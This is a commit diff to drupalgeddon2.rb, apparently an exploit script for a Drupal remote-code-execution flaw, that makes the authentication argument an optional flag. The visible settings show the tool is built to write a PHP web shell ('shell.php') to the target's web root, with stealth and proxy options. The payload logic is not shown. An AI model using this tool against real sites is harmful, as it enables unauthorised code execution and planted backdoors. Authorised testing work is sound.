issue-52 make authentication command-line parameter optional

Change-Id: Ifa7e9d9389cffbfe164eaef2e6844519c9d816fe

drupalgeddon2.rb

@@ -8,22 +8,19 @@
 #
 
 
-require "base64"
-require "json"
-require "net/http"
-require "openssl"
-require "readline"
+require 'base64'
+require 'json'
+require 'net/http'
+require 'openssl'
+require 'readline'
+require 'highline/import'
 
 
 # Settings - Try to write a PHP to the web root?
 try_phpshell = true
 # Settings - General/Stealth
 $useragent = "drupalgeddon2"
 webshell = "shell.php"
-# Settings - Output
-$verbose = false
-
-
 # Settings - Proxy information (nil to disable)
 $proxy_addr = nil
 $proxy_port = 8080
@@ -175,36 +172,44 @@ def verbose(text)
 
 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
+def init_authentication()
+  $uname = ask('Enter your username:  ') { |q| q.echo = false }
+  $passwd = ask('Enter your password:  ') { |q| q.echo = false }
+  $uname_field = ask('Enter the name of the username form field:  ') { |q| q.echo = true }
+  $passwd_field = ask('Enter the name of the password form field:  ') { |q| q.echo = true }
+  $login_path = ask('Enter your login path (e.g., user/login):  ') { |q| q.echo = true }
+  $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...):  ') { |q| q.echo = true }
+end
+
+def is_arg(args, param)
+  args.each do |arg|
+    if arg == param
+      return true
+    end
+  end
+  return false
+end
+
 
 # Quick how to use
-if ARGV.empty? or ARGV.length < 2
-  puts 'Usage: ruby drupalggedon2.rb <target> <authentication?yes|no> [--verbose]'
+def usage()
+  puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'
   puts 'Example for target that does not require authentication:'
-  puts '       ruby drupalgeddon2.rb https://example.com no'
+  puts '       ruby drupalgeddon2.rb https://example.com'
   puts 'Example for target that does require authentication:'
-  puts '       ruby drupalgeddon2.rb https://example.com yes'
-  exit
+  puts '       ruby drupalgeddon2.rb https://example.com --authentication'
 end
 
-require 'highline/import'
 
-$verbose = false
-if ARGV.length == 3 and ARGV[2] == '--verbose'
-  # Settings - Output
-  $verbose = true
+# Read in values
+if ARGV.empty?
+  usage()
+  exit
 end
 
-# Read in values
 $target = ARGV[0]
-
-if ARGV[1] == 'yes'
-  $uname = ask('Enter your username:  ') { |q| q.echo = false }
-  $passwd = ask('Enter your password:  ') { |q| q.echo = false }
-  $uname_field = ask('Enter the name of the username form field:  ') { |q| q.echo = true }
-  $passwd_field = ask('Enter the name of the password form field:  ') { |q| q.echo = true }
-  $login_path = ask('Enter your login path (e.g., user/login):  ') { |q| q.echo = true }
-  $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...):  ') { |q| q.echo = true }
-end
+init_authentication() if is_arg(ARGV, '--authentication')
+$verbose = is_arg(ARGV, '--verbose')
 
 
 # Check input for protocol
@@ -232,7 +237,6 @@ def verbose(text)
 uri = URI($target)
 $http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)
 
-
 # Use SSL/TLS if needed
 if uri.scheme == "https"
   $http.use_ssl = true